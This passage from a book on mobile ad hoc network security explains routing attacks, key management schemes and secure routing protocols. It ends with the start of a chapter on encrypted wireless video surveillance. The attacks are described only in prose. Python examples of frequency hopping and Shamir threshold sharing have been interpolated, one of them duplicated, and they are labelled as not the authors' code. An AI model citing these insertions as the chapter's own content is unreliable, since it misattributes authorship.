Ad hoc networks require relatively stronger security measures due to the nature of their topological weaknesses. The fact that there is no central infrastructure for ad hoc entities requires that every individual ad hoc element be part of the broader security scheme. Other issues also play roles, such as limited energy (relatively low battery life) and lack of physical security (i.e., the device could be stolen or tampered with). To remedy these limitations, it is necessary to establish cooperation enforcement between all entities and to utilize secure routing schemes and efficient key management. The last two issues are discussed in this chapter in more detail.

Secure Routing

The objective of secure routing is to provide a means for authenticating routing decisions and ensuring information integrity. The entity authentication includes authentication of the source, the destination, and all of the intermediate nodes. For specific ad hoc routing protocols, different measures, such as asymmetric or symmetric key cryptography, could be used.

Attacks on Ad Hoc Routing Protocols

Attacks on ad hoc routing protocols are presented in Figure 4 and Table 2. Again, these attacks are categorized into passive and active attacks. Each attack works in such a way as to paralyze a section of the routing protocol, therefore securing the routing protocols is very important.

In order to prevent attacks on routing protocols, security measures should be taken into consideration to prevent attacks and fortify the routing algorithms. These measures should provide the following:

• Availability: Ultimately it should always be possible (with very high probability) to find an available route from any source to any destination within the wireless range. In ad hoc routing protocols, this feature should include preventing routing table overflow (an entry in the table to a nonexisting destination) and rushing attacks (an attacker disseminates RREQs quickly throughout the network, suppressing any later legitimate RREQs when nodes drop them due to duplicate suppression).
• Isolation: The ability to identify misbehaving nodes and disable them from interfering with the routing schemes. Preventing wormhole and black hole attacks are examples of this category.
• Lightweight computations: Assigning heavy computing tasks to the least possible number of nodes (battery power protection) to prevent sleep deprivation.
• Location privacy: Protecting information about the location of nodes in a network and the network structure, to prevent location disclosure.
• Self-stabilization: Automatically recovering from any problem in a finite amount of time without human intervention.
• Byzantine robustness: This requires the routing protocol to function correctly even if some of the nodes participating in routing are intentionally disrupting its operation. This is important in preventing impersonation attacks.

Figure 4. Active and passive attacks in ad hoc routing protocols (Adapted from Wang, Lu, & Bhargava, 2003)

Table 2. Definition of a few attacks on ad hoc routing protocols

Route Broken Message: Sets a false route error to send a message back to the source (route discovery is reinitiated). This exhausts the limited bandwidth.
Malicious Route Request: Sends an invalid route request. This exhausts the limited bandwidth.
False Distance Vector: This involves replying "one hop to destination" to every request and selecting a large enough sequence number. This is an attack on the connectivity.
False Destination Sequence: This is to select a large number of hops to the destination, which is an attack on the connectivity.
Routing Table Overflow: A malicious node advertises routes to nonexisting nodes. Proactive routing protocols are more vulnerable.
Routing Table Poisoning: A malicious or compromised node sends fictitious routing updates or modifies genuine route updates, which causes suboptimal routing.
Packet Replication: A malicious or compromised node replicates stale packets, causing excessive bandwidth consumption.
Route Cache Poisoning: An adversary can poison the route cache, which is a major issue for on-demand routing protocols, since they maintain a route cache to all known nodes.
Rushing Attack: An adversary that received a RREQ from a source floods the network quickly before any other legitimate nodes can react, causing other nodes to believe that they have received duplicates, thus discarding the legitimate responses. Therefore any route discovered by the source node would contain the adversary node as one of the legitimate intermediate nodes.

Possible Solutions

To offer secure routing protocols, the following solutions are used:

• Trusted route discovery: To avoid internal attacks, the route discovery phase in ad hoc routing protocols should send packets via trusted routes.
• Redundant paths and multipath routing: Having redundant paths increases route robustness by providing more route choices, such as in multipath ad hoc routing protocols.
• Nondisclosure method and anonymous routing: Anonymous routing avoids location disclosure by using distributed independent security agents. This way, outsiders cannot identify the communicating parties.
• Hierarchical structure or zone-based routing: This type of routing protocol provides a foundation for authentication and local link-state routing.
• Authentication among hosts: This requires two-way authentication schemes for all parties to prevent impersonation (spoofing).
• Preventing traffic pattern detection: This is important in hiding the traffic patterns and the frequency of transmitting information, as part of anonymous routing.
• Intrusion detection: Monitors the behavior of suspected hosts for anomaly detection and attack prevention.
• Securing the medium: To prevent physical-layer-based DoS attacks, a few methods have been introduced as security deterrence schemes, such as:
   - Frequency inversion
   - Frequency hopping
  These two methods will be discussed in detail in the next section.

Challenges in Secure Routing for MANETs

As mentioned previously, securing routing protocols for wireless systems is more challenging than

securing wired protocols, because not only do all of the possible wired-based attacks apply to ad hoc networks, but mobility also allows new attacks. The most important difference is the vulnerability of the medium. This is very important because everyone shares the same medium (open air), and if extra attention is not given to its security, it could contribute to a DoS attack (lack of availability or jamming). Therefore the following are the extra challenges for securing wireless routing protocols:

• Intrusion detection: Intrusion detection attempts to detect any malicious or unauthorized activity, whether caused by an internal entity or an external source. There are a few types of intrusion detection systems:
   - Anomaly-based: Compares the activities in a network with a predefined normal activity map. In these systems, a sudden change in the activities would trigger an anomaly alarm. Other types include: network intrusion detection system (NIDS), host-based intrusion detection system (HIDS), application protocol-based intrusion detection system (APIDS), and protocol-based intrusion detection system (PIDS).
• Secure routing: This shares a common ground with a layered approach, in the sense that security mechanisms have been integrated with the normal routing procedures. Routing is mostly covered in the network layer. Therefore secure routing is provisioned in the network layer. Secure routing will be discussed in detail later in this chapter.
• Key management service: Because of the difficulties in key exchange, key management is a challenge in ad hoc networks. The following schemes are a few examples of existing key exchange methods ("Key Management," 2001):
   - Signature keys
   - Signature verification keys
   - Authentication (public, private, secret) keys
   - Data encryption (long-term, short-term) keys
   - Keys based on random number generation
   - Key encryption keys, which are further used for wrapping keys
   - Derivation keys used from master keys and master keys used from derivation keys
   - Key transport for public and private keys
   - Static key agreement used for public and private keys
   - Ephemeral key agreement for public and private keys
  Key management faces the following particular challenges:
   - Lack of a security infrastructure
   - Limited processing power
   - It should be fully distributed with minimal dependencies
   - Domain parameter and public key validations
   - Compromise of keys and related material
   - Key recovery: consideration and policy
   - Audit and accountability issues
  Therefore the challenges are the trust model, cryptosystems, key creation, key storage, and key distribution.
• Securing the medium: To prevent DoS, the following techniques are used as security deterrents:
   - Frequency inversion: The process of altering the signal's frequency spectrum in such a way that the signal cannot be reconstructed and understood without knowledge of the inversion pattern.
   - Frequency hopping: Dividing the spectrum into various frequencies and using different frequencies in a predetermined fashion.
   - Shared secret frequency key: Sharing the secret of the frequency pattern between transmitters.
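The frequency hopping and shared secret frequency key items above, as an added example that is not code from the chapter: the hop pattern is derived from a shared secret by an HMAC over the time-slot number, so two radios holding the secret land on the same channel in every slot, while a party without the secret cannot predict the pattern. The channel set, the secret value, and the slot numbering are constructed assumptions, and deriving the pattern with HMAC-SHA256 is my choice rather than something the chapter prescribes.

```python
import hashlib
import hmac

# Constructed channel set: eleven numbered channels, as in a 2.4 GHz band plan.
CHANNELS = list(range(1, 12))


def hop_channel(secret: bytes, slot: int, channels=CHANNELS) -> int:
    """Channel for one time slot: HMAC(secret, slot) reduced onto the channel set.
    Assumption: both radios share a monotonically increasing slot counter."""
    tag = hmac.new(secret, slot.to_bytes(8, "big"), hashlib.sha256).digest()
    return channels[int.from_bytes(tag[:4], "big") % len(channels)]


def hop_sequence(secret: bytes, first_slot: int, count: int, channels=CHANNELS):
    """The channels a transmitter will use for `count` consecutive slots."""
    return [hop_channel(secret, s, channels) for s in range(first_slot, first_slot + count)]


def receiver_in_sync(secret: bytes, observed) -> bool:
    """observed: list of (slot, channel) pairs on which a receiver heard the
    transmitter. True when every observation matches what the secret predicts;
    a receiver with the wrong secret falls out of sync almost immediately."""
    return all(hop_channel(secret, slot) == ch for slot, ch in observed)


def slots_hit_by_fixed_jammer(sequence, jammed_channel: int) -> int:
    """Slots of a hop sequence lost to a jammer parked on one channel. On average
    only 1/len(CHANNELS) of the slots, which is the deterrence the text describes."""
    return sum(1 for ch in sequence if ch == jammed_channel)


if __name__ == "__main__":
    KEY = b"constructed-shared-frequency-key"   # constructed, not a real key
    tx = hop_sequence(KEY, 1000, 16)
    print("hops:", tx)
    print("receiver with key in sync:", receiver_in_sync(KEY, list(zip(range(1000, 1016), tx))))
    print("slots lost to a jammer on channel 6:", slots_hit_by_fixed_jammer(tx, 6))
```

The secret here plays the role the text gives the shared secret frequency key: it is the only thing that turns a public channel plan into a pattern a third party cannot follow. Slot synchronization is assumed rather than solved; in practice the radios need a shared clock or a resynchronization procedure, which the chapter does not cover.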

Key Management Approaches

Due to the variable nature of ad hoc network topologies and the physical and resource limitations, key management is of great importance. There are many proposals for key management for ad hoc protocols; however, we introduce two methods, namely, the ad hoc key distribution center (AKDC) and decentralized key generation and distribution (DKGD) (Adibi et al., 2006):

Figure 5. AKDC scheme (Adapted from Adibi et al., 2006)

• Ad hoc key distribution center: As shown in Figure 5, AKDC uses a centralized ad hoc scheme for key management, distribution, and access. In the AKDC, each device wishing to communicate with another device will have to undergo the following series of processes by the AKDC:
   - Identity and location determination
   - Authentication
   - Authorization
   - Key provision
   - Key delivery
  A lot of intelligence and power must be integrated into the design of an AKDC; however, there are a few downsides of having a central point. The fact that there is a known center for key distribution, and that its location is known to all, makes the AKDC prone to a variety of attacks, including DoS attacks. This problem is remedied by the use of a decentralized and distributed scheme.
• Decentralized key generation and distribution: In a DKGD scheme (Figure 6), the key management scheme is distributed across the wireless range through DKGD agents. Every ad hoc element discovers the closest DKGD agent and binds with it. The fact that DKGDs are distributed across the network poses less of a security concern, as the single point of failure is no longer an issue. Whether AKDC or DKGD is used, all legitimate local ad hoc elements should register with the AKDC or the DKGD.
• Ad hoc gateway access control (AGAC): So far, the AKDC and DKGD schemes assume in-domain communications among ad hoc elements. However, for inter-domain security measures, when an outside element seeks communication with a local element, a new element, which is called the AGAC, is responsible for the security concerns. AGAC

agents are located at the boundaries of radio domains, that is, where two or more local ad hoc domains intersect.
• Secure and efficient key management (SEKM): SEKM (Wu, Wu, Fernandez, Ilyas, & Magliveras, 2005) creates a public key infrastructure (PKI) using a secret shared key scheme on top of underlying multicast server groups. In SEKM, a view of the certificate authority (CA) is created by each server group. This provides and updates certificate services for all the participating nodes. For an efficient certificate delivery service, a ticket mechanism is introduced and used.
• Self-organized CA (SOCA) (Michiardi, 2004): In traditional cryptographic systems, there is one sender, one receiver, and an eavesdropper who is the opponent. However, SOCA is based on threshold cryptography.

Figure 6. DKGD scheme (Adapted from Adibi, Erfani, & Harbi, 2006)

Figure 7. Self-organized certificate authorities (SOCA) (Adapted from Michiardi, 2004)
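SOCA rests on threshold cryptography, in which the power to regenerate a secret key is shared among several agents. Shamir's (k, n) secret sharing over a prime field is the standard construction with that property, and the following is an added example of it, not the chapter's code and not Michiardi's SOCA implementation. The field prime, the constructed CA key value, and the (3, 5) parameters are assumptions. Any three of the five agents can rebuild the key; any two cannot, because with the leading coefficient forced nonzero the two-point interpolation at x = 0 never lands on the secret.

```python
import secrets
from itertools import combinations

# Assumption: a Mersenne prime large enough to hold the constructed key below.
P = 2**127 - 1


def _eval_poly(coeffs, x, p=P):
    """Evaluate a polynomial with coefficients [a0, a1, ...] at x, mod p (Horner)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % p
    return acc


def split_secret(secret, k, n, p=P, rng=None):
    """Shamir (k, n) sharing: returns [(x, y)] for x = 1..n; any k shares
    reconstruct `secret`. rng(upper) -> int in [0, upper); defaults to
    secrets.randbelow so the shares are unpredictable."""
    if not 0 <= secret < p:
        raise ValueError("secret must lie in the field")
    if not 1 <= k <= n:
        raise ValueError("need 1 <= k <= n")
    rng = rng or secrets.randbelow
    coeffs = [secret] + [rng(p) for _ in range(k - 1)]
    if k > 1:
        while coeffs[-1] == 0:  # keep the degree exactly k-1 so k-1 shares never suffice
            coeffs[-1] = rng(p)
    return [(x, _eval_poly(coeffs, x, p)) for x in range(1, n + 1)]


def reconstruct(shares, p=P):
    """Lagrange interpolation at x = 0 over whatever shares are supplied."""
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share indices")
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = (num * (-xj)) % p
                den = (den * (xi - xj)) % p
        total = (total + yi * num * pow(den, -1, p)) % p
    return total


def soca_demo(k=3, n=5, rng=None):
    """Constructed CA signing key shared among n SOCA agents; any k recover it."""
    ca_key = int.from_bytes(b"ca-key-demo", "big")  # constructed value, not a real key
    shares = split_secret(ca_key, k, n, rng=rng)
    every_k_subset_works = all(reconstruct(list(s)) == ca_key
                               for s in combinations(shares, k))
    fewer_than_k_fails = reconstruct(shares[:k - 1]) != ca_key
    return ca_key, shares, every_k_subset_works, fewer_than_k_fails


if __name__ == "__main__":
    key, shares, ok, fails = soca_demo()
    print(f"{len(shares)} shares issued; every 3-subset recovers key: {ok}; "
          f"2 shares recover key: {not fails}")
```

The example rebuilds the key to show the threshold property; a deployed threshold CA does not do that at any single node. Each agent holds its share permanently and produces a partial signature, and k partial signatures are combined into the CA's signature, so the full key never exists in one place. That is the "distributed approach with self-organization" the chapter credits SOCA with, and the reason the number of reachable agents (the network density it names as the downside) decides whether a certificate can be issued at all.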

Threshold cryptography allows one to share the power of a cryptosystem, in that the power to regenerate a secret key is shared among several agents (Figure 7). The advantage of this is the distributed approach with self-organization. The downside is the network density.

Security Mechanisms in MANETs

There are several mechanisms, embedded into the protocol schemes, which contribute to the robustness of security. Below is a list of a few of these mechanisms.

• Multipath routing: Multipath routing (Bonum & Othman, 2003) works by enhancing data confidentiality through the transmission of data via multiple paths. This is done to prevent any fixed unauthorized node from attaining useful data. This requires no encryption, as the data is already "split" among various paths.
• Hierarchical routing: Hierarchical routing (Rhee, Park, & Tsudik, 2004) is one of the categories of ad hoc routing protocols in which traffic handling is done through different layers and local activities are kept local. Therefore there is no need to broadcast all changes to the entire radio domain. Only global moves are reported across the entire network. In the security and key management cases, the architecture could use a two- or more-layered key management approach where groups of nodes are divided into cell groups consisting of ground nodes and control groups containing cell group managers.
• Tunneling: Tunneling (Choi, Song, Cao, & Porta, 2005) is widely used in many security schemes, such as virtual private networks (VPNs) and IP-Security (IPSec).
• Other measures in MANETs: Other measures which could be adopted in ad hoc scenarios are (Menezes, Oorschot, & Vanstone, 1996):
   - Web of trust (PGP): A peer-based (one-to-one) system which requires no certificate authority. PGP uses symmetric and public-key cryptography schemes and includes a mechanism which binds the public keys to the user identities.
   - Crypto-based ID: A crypto-based ID (CBID) requires no infrastructure and uses a binding between address and signature.
   - ID-based crypto: ID-based crypto suggests that having an identity implies being authorized, therefore no certificates are needed.
   - Context-dependent authentication: Authentication is based on the content of the message.
   - Password authenticated key exchange (PAKE): In a PAKE, two or more communicating parties, based on their knowledge of a password only, establish a cryptographic key through a message exchange, in such a way that an unauthorized entity cannot participate in the scheme and is kept from guessing the password. There are two forms of PAKE, namely balanced and augmented schemes.
   - Cooperation enforcement mechanisms using game theoretical approaches: Game theory is a powerful tool that models interactions among participating entities. Each player tries to maximize some utility function in a distributed manner. The Nash equilibrium is where the game settles, assuming the equilibrium exists; however, since nodes usually act selfishly, the equilibrium point might not be the socially optimal point.

Secure Protocols for MANETs

The main idea for these protocols is to offer extended security, therefore with only security in


mind, the entire protocol functionalities have been designed for security in the network layer. Four of these protocols are introduced as follows:

ARIADNE (A Secure On-Demand Routing Protocol for Ad Hoc Networks)

ARIADNE (Hu, Perrig, & Johnson, 2002) relies only on highly efficient symmetric cryptographic systems and does not require trusted hardware or powerful processors. Routing messages can be authenticated using ARIADNE through one of the following three schemes: 1) using shared secrets among each pair of nodes, 2) using shared secrets among communicating nodes together with broadcast authentication, and 3) using digital signatures. ARIADNE works well with timed efficient stream loss-tolerant authentication (TESLA) (Hu et al., 2002), which is an efficient broadcast authentication scheme that requires loose time synchronization, where a receiver knows an upper bound of the difference between the sender’s local time and the receiver’s local time.

SEAD (Secure Efficient Distance Vector Routing for Mobile Wireless Ad Hoc Networks)

SEAD (Hu, Johnson, & Perrig, 2002) is based on the design of the destination-sequenced distance-vector routing protocol (DSDV). To prevent DoS, SEAD uses efficient one-way hash functions and does not include the usage of asymmetric cryptographic operations. SEAD is robust against multiple uncoordinated attackers, which create incorrect routing state for other nodes.

SADSR (Security-Aware Adaptive Dynamic Source Routing Protocol)

SADSR (Ghazizadeh, Ilghami, Sirin, & Yaman, 2002) includes an authentication scheme in which the routing protocol messages are authenticated using asymmetric cryptographic-based digital signatures. The basic idea behind the functionality of SADSR is to have multiple routes to every destination and to store a local trust value related to each node throughout the network. A trust value is also assigned to each path based on the nodes’ trust values. The paths with higher trust values are preferred and selected for routing.

SDSR (Secure Dynamic Source Routing)

SDSR (Kargl, Geiss, Schlott, & Weber, 2005) prevents various potential (active and passive) attacks on ad-hoc-based networks. It also deals with selfish nodes in the following scenarios:

• Motivation-based approaches: Try to motivate network users to actively participate in the MANET.
• Detect and exclude: This scheme detects and excludes selfish nodes from the routing scheme.
• Mobile Intrusion Detection System (MobIDS): Focuses on integrating with other mechanisms for detecting selfish nodes.

CONCLUSION

Attacks can be categorized as per node behaviors, protocol schemes, or layered approaches. Security challenges in MANETs include securing the medium (preventing DoS attacks, etc.), securing the routing schemes, intrusion detection and prevention, key management, peer-to-peer security options, user and data authentication/authorization, data encryption, and digital signatures.

REFERENCES

Adibi, S., Erfani, S., & Harbi, H. (2006, May). Security routing in MANETs: A comparative study. Paper presented at the Electro/Information Technology (EIT) Conference.

Bonum, S., & Othman, J. B. (2003). Data security in ad hoc networks using multipath routing. In Proceedings of the 14th IEEE International Symposium on Personal, Indoor and Mobile Radio Communication (PIMRC 2003), vol. 2 (pp. 1331-1335). Beijing, China.

Choi, H., Song, H., Cao, G., & Porta, T. L. (2005). Mobile multi-layered IPsec. Paper presented at the INFOCOM.

Ghazizadeh, S., Ilghami, O., Sirin, E., & Yaman, F. (2002). Security-aware adaptive dynamic source routing protocol. ILCN.

Hu, Y. C., Johnson, D. B., & Perrig, A. (2002). SEAD: Secure efficient distance vector routing for mobile wireless ad hoc networks. MCSA.

Hu, Y. C., Perrig, A., & Johnson, D. B. (2002). Ariadne: A secure on-demand routing protocol for ad hoc networks. Paper presented at the MOBICOM.

Kargl, F. (2006, November). Threats and security requirements for VANETs secure vehicle communication. Paper presented at the C2C-CC Sec. Workshop.

Kargl, F., Geiss, A., Schlott, S., & Weber, M. (2005). Secure dynamic source routing. Paper presented at the HICSS.

Key Management, National Institute of Standards and Technology (NIST). (2001, November). Retrieved October 7, 2007, from http://csrc.nist.gov/encryption/kms/Key%20Mgmt%20Guideline%20Overview.ppt

Lang, D. (2003, March). A comprehensive overview about selected ad hoc networking routing protocols (Tech. Rep. No. TUM-I0311). Technische Universität München, Department of Computer Science.

Lu, Q. (2002, December). Vulnerability of wireless routing protocols. University of Massachusetts Amherst.

Maleki, M., Dantu, K., & Pedram, M. (2002, August). Power-aware source routing protocol for mobile ad hoc networks. In Proceedings of the Symposium on Low Power Electronics and Design (pp. 72-75).

Manoj, B. S., & Murthy, C. S. R. (2005, January). Transport layer and security protocols for ad hoc wireless networks. Retrieved October 7, 2007, from http://www.phptr.com/articles/article.asp?p=…&seqNum=1&rl=1

Menezes, A. J., Oorschot, P. C. V., & Vanstone, S. A. (1996). CRC handbook of applied cryptography. CRC Press.

Michiardi, P. (2004, March). Security in wireless ad hoc networks. Institut Eurecom.

Rhee, K. H., Park, Y. H., & Tsudik, G. (2004, June). An architecture for key management in hierarchical mobile ad-hoc networks. Journal of Communications and Networks, 6(2).

Wang, W., Lu, Y., & Bhargava, B. (2003, March). On security study of two distance vector routing protocols for ad hoc networks. Purdue University, CERIAS and Department of Computer Sciences.

Wu, B., Wu, J., Fernandez, E. B., Ilyas, M., & Magliveras, S. (2005). Secure and efficient key management in mobile ad hoc networks. Elsevier.

KEY TERMS

Access Control: This is a security mechanism to make sure that only legitimate parties have access to the data they are supposed to have access to.

AKDC: Ad hoc key distribution center is a central component in an ad hoc network responsible for providing keys to ad hoc elements.

ARIADNE: A secure on-demand routing protocol for ad hoc networks.

Authentication: Authentication is required to make sure communicating parties are the ones who they claim to be.

Availability: A stochastic measure of predicting the availability of the communication channel and resources to the users.


CA: Certificate authority is responsible for issuing digital certificates.

Confidentiality: This is a basic security requirement in which the address, location, and/or the data transferring between two communicating parties are to be kept as secrets.

DKGD: Decentralized key generation and distribution is another key distribution scheme for ad hoc networks in which the key distribution mechanism is done by distributed elements, not by a centralized entity.

Integrity: This is another basic security requirement. Integrity guarantees the correctness of the data transferring between two communicating parties, or their location information.

Nonrepudiation: This is a concept of ensuring that none of the communicating parties can deny the fact that they had sent or received certain data.

SADSR: Security-aware adaptive dynamic source routing protocol.

SEAD: Secure efficient distance vector routing for mobile wireless ad hoc networks.

SEKM: Secure and efficient key management is another key management scheme which involves public key infrastructure.

SDSR: Secure dynamic source routing.

SOCA: Self-organized CA is a threshold-based cryptosystem in which the power is shared among different CAs.
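The threshold-cryptography idea behind SOCA (the power to regenerate a secret key is shared among several agents, and a sparse network leaves too few agents reachable), as an added example that is not the chapter's code: Shamir secret sharing of a CA key over a prime field with a t-of-n threshold. The field prime, the 3-of-5 parameters and the agent numbering are assumptions made here.

```python
"""Threshold sharing of a CA secret key among MANET agents (Shamir's scheme).

Added example in the spirit of the chapter's SOCA description; it is not the
authors' code. The field prime, the t-of-n parameters and the agent ids are
assumptions made here.
"""
import secrets

PRIME = (1 << 127) - 1   # Mersenne prime used as the share field (assumption)


def split_secret(secret, threshold, agents, rng=None):
    """Give agent i (1..agents) the share f(i) of a random degree threshold-1
    polynomial with f(0) = secret; any threshold shares regenerate the secret."""
    if not 0 < threshold <= agents or not 0 <= secret < PRIME:
        raise ValueError("need 0 < threshold <= agents and 0 <= secret < PRIME")
    draw = rng.randrange if rng is not None else secrets.randbelow
    coeffs = [secret] + [draw(PRIME) for _ in range(threshold - 1)]
    shares = {}
    for x in range(1, agents + 1):
        y = 0
        for c in reversed(coeffs):          # Horner evaluation of f(x) mod PRIME
            y = (y * x + c) % PRIME
        shares[x] = y
    return shares


def regenerate_secret(shares, threshold):
    """Lagrange interpolation at x = 0 using exactly threshold shares."""
    if len(shares) < threshold:
        raise ValueError("fewer shares than the threshold")
    points = list(shares.items())[:threshold]
    secret = 0
    for xi, yi in points:
        num = den = 1
        for xj, _ in points:
            if xj != xi:
                num = num * (-xj) % PRIME        # product of (0 - xj)
                den = den * (xi - xj) % PRIME    # product of (xi - xj)
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret


def regenerate_from_reachable(shares, reachable, threshold):
    """Model the density downside: only shares held by currently reachable
    agents can be collected; below the threshold the key cannot be regenerated."""
    available = {i: s for i, s in shares.items() if i in reachable}
    if len(available) < threshold:
        return None
    return regenerate_secret(available, threshold)


if __name__ == "__main__":
    ca_key = secrets.randbelow(PRIME)            # constructed sample secret
    shares = split_secret(ca_key, threshold=3, agents=5)
    print(regenerate_from_reachable(shares, {1, 3, 5}, 3) == ca_key)   # True
    print(regenerate_from_reachable(shares, {2, 4}, 3))                # None
```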




Chapter XXXII
A Novel Secure Video
Surveillance System Over
Wireless Ad Hoc Networks
Hao Yin
Tsinghua University, China

Chuang Lin
Tsinghua University, China

Zhijia Chen
Tsinghua University, China

Geyong Min
University of Bradford, UK

ABSTRACT

The integration of wireless communication and embedded video systems is a demanding and interesting topic which has attracted significant research efforts from the community of tele… This chapter discusses the challenging issues in wireless video surveillance and presents the detailed design for a novel highly-secure video surveillance system over ad hoc wireless networks. To this end, we explore the state-of-the-art cross domains of wireless communication, video processing, embedded systems, and security. Moreover, a new media-dependent video encryption scheme, including a reliable data embedding technique and a real-time video encryption algorithm, is proposed and implemented to enable the system to work properly and efficiently in an open and insecure wireless environment. Experiments are conducted to demonstrate the advantages of the new system, including high security guarantee and robustness. The chapter would serve as a good reference for solving the challenging issues in wireless multimedia and bring new insights on the interaction of different technologies within the cross application domain.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

INTRODUCTION

With the ever-increasing security demands of military and scientific applications, the efficiency of a highly secure and reliable video surveillance system attracts significant interest from both academia and industry. The implementation and development of such a system are greatly affected by the techniques in wireless communication, video processing, embedded systems, and security guarantee.

Recent advances in embedded systems and wireless communications are enabling cost-effective digital wireless multimedia systems. The forthcoming integration of wireless communications and embedded video systems is a demanding and interesting research topic. Video surveillance has resorted to wireless transmission due to the several serious problems that arise when traditional coaxial or high-tech fiber-optic cables are adopted to transmit video images from the surveillance cameras to the stations at which the images are monitored and/or recorded. Compared with the traditional wire-line counterparts, wireless video surveillance systems do not require expensive and time-consuming system construction and civil-engineering work. They can therefore be deployed rapidly with negligible environmental impact. Furthermore, wireless systems generally require lower costs of network maintenance, management, and operation.

However, some fundamental issues, such as framework design of wireless networks, video processing, video data transmission, video quality control, and system security should be resolved before wireless video surveillance systems can be successfully deployed (Garcia-Macias et al., 2003). Among these important issues, system security is the most challenging problem and is the main concern of this chapter. The Intel IXP425 network processor provides an ideal choice for implementing a secure ad hoc video surveillance system, but the security issue is still a hot-spot that the IXP425 cannot handle well. Therefore, an effective video encryption algorithm is necessary and meaningful in a wireless video surveillance system. At the same time, the secure routing protocol and system architecture should be carefully designed to avoid serious security flaws (Yin, Lin, Sebastien, & Chu, 2005).

This chapter explores the state-of-the-art cross domains of wireless communication, video processing, embedded systems and security, discusses the challenging issues in wireless video surveillance, and presents the detailed design of a novel highly-secure video surveillance system over ad hoc wireless networks. The rest of this chapter is organized as follows. Section 2 provides a review of wireless networks, the ad hoc solution and security issues. Section 3 presents the design and implementation of the new video surveillance system and Section 4 evaluates its performance. Section 5 highlights the future trends in the relevant research areas. Finally, Section 6 concludes this chapter.

BACKGROUND

Wireless Networks

Wireless technologies, in the simplest sense, enable one or more devices to communicate without physical connections (without requiring peripheral cabling). Wireless networks serve as the transport mechanism among mobile devices or between these devices and the fixed wired networks (e.g., enterprise networks and the Internet). A wireless network has tremendous advantages in comparison with its wired counterpart: no network cable has to be installed through walls and floors, thus greatly reducing the cost and making the architecture more flexible.

The development of 802.11g (IEEE, 2003), based on the orthogonal frequency-division multiplexing (OFDM) technology, allows high-load applications to be adapted to the wireless environment. It is claimed that an optimal throughput of 54 Mbps and a range of up to 100 feet indoors can be achieved. As the signal is modulated at 2.4 GHz, it is less affected by walls and physical obstacles than 802.11a (5 GHz). Thus our system is based on 802.11g wireless infrastructure ad hoc networks.

Ad Hoc Solution

Ad hoc networks are a new wireless networking paradigm for mobile hosts. Unlike traditional mobile wireless networks, ad hoc networks do not rely on any fixed infrastructure. Instead, hosts rely on each other to keep the network connected. Ad hoc networks are designed to dynamically connect remote devices such as cell phones, laptops, and PDAs. These networks are termed “ad hoc” because


of their shifting network topologies. Whereas wireless LANs use a fixed network infrastructure, ad hoc networks maintain random configurations, relying on a master-slave system connected by a wireless medium to enable communication between mobile devices (Haas, 1999; Zhou, 1999).

The system we are designing is organized in an ad hoc manner. The nodes themselves (with camera) carry the flux towards the monitoring center, and all the routing tasks are performed by the camera nodes. A careful deployment can share the traffic load among all the camera nodes and effectively reduce the bottleneck effect as compared with an architectural network. It is also the cheapest solution as there is no need for extra networking hardware besides the cameras, network processors, and the monitoring center.

However, the design of an ad hoc architecture is complex because of the routing and security issues. In a monitoring system, the node positions are static and predetermined by the topology of the building. The cameras are in a nonprotected environment, and they are susceptible to being damaged or even destroyed. Thus it would be preferable if every node has at least two direct neighbors on the way towards the monitoring center so that the system can still work properly in case some camera nodes are faulty.

Security Issues

Among the issues the wireless solution faces, system security is the most challenging problem. The NIST handbook An Introduction to Computer Security generically classifies security threats into nine categories ranging from errors and omissions to threats to personal privacy (Basgall, 1999). All of these represent potential threats in wireless networks as well. However, the more immediate concerns for wireless communications are device theft, denial-of-service, malicious hackers, malicious code, theft of service, and industrial and foreign espionage.

Data embedding techniques allow for a signal to be hidden without dramatically distorting the original content. Effective data embedding techniques should be able to invisibly embed data, allow for easy extraction, and achieve a high embedding rate. The most popular application of data embedding is digital watermarking. Lots of research work has been done in this field over the past years. Although it is worth noting that none of the existing schemes are capable of satisfying the demand for media-dependent access control in wireless video surveillance systems, some ideas and frameworks of these digital watermark algorithms are valuable and may be extended to design the desired data embedding scheme (Yin, Lin, Qiu, Min, & Chu, in press).

The classical approach to watermarking a compressed video stream is to decompress the video, then use a spatial-domain or transform-domain watermarking technique to embed the watermark into the video signal, and finally recompress the watermarked video. Alattar, Lin, and Celik (2003) point out three major disadvantages of using the classical approach and further present a faster and more flexible approach to watermarking compressed video named compressed-domain watermarking. With this approach, the original compressed video is partially decoded to expose the syntactic elements of the compressed bitstream (such as encoded discrete cosine transform [DCT] coefficients) that are modified to insert the watermark and reassembled to form the compressed watermarked video.

Patchwork (Bender, Gruhl, Morimoto, & Lu, 1996) and quantization index modulation (QIM) (Chen & Wornell, 2001) are the two known techniques for the embedding algorithm. Patchwork (Bender et al., 1996) is a statistical scheme based on a pseudorandom and statistical process. Patchwork is host image independent and can invisibly embed a specific statistic pattern (composed of several pairs of specific pixels) in a host image with a Gaussian distribution. It shows reasonably high resistance to most nongeometric image modifications. But the major disadvantage is that only one bit can be embedded in one frame. Moreover, this algorithm operates on specific pairs of points, and the structure of the video bitstream is changed by some adaptive processes such as transcoding. So during the detecting procedure these pairs of points at the same position are not the same as the original, or even


out of borders due to the change of image size. As a result, the extracted data are likely to be wrong. Our proposed scheme is based on the statistical property of the luminance value, but differently we use image fields instead of pairs of points to overcome the above mentioned problems.

Chen and Wornell (2001) propose a QIM scheme for efficiently embedding and drawing out data. The QIM method embeds information not simply by adding numbers to the host signal, but by first modulating an index or sequence of indices with the embedded information and then quantizing the host signal with the associated quantizer or sequence of quantizers. During the detecting procedure, the embedded information is determined by judging the minimum distance between the embedded signal and the different quantized results. It is known that the QIM method is better than additive spread spectrum and generalized low-bits modulation (LBM) not only from the point of view of rate-distortion-robustness tradeoffs, but also against bounded perturbation and fully informed attacks arising in several copyright applications. Since requantization is carried out in the transcoding procedure and the quantizers are different from the ones used in the video encoding process, lots of computational errors are produced and the detection is likely to fail. Our scheme improves the QIM by proposing an approach to alter the average luminance value of fields.

Routing Protocol

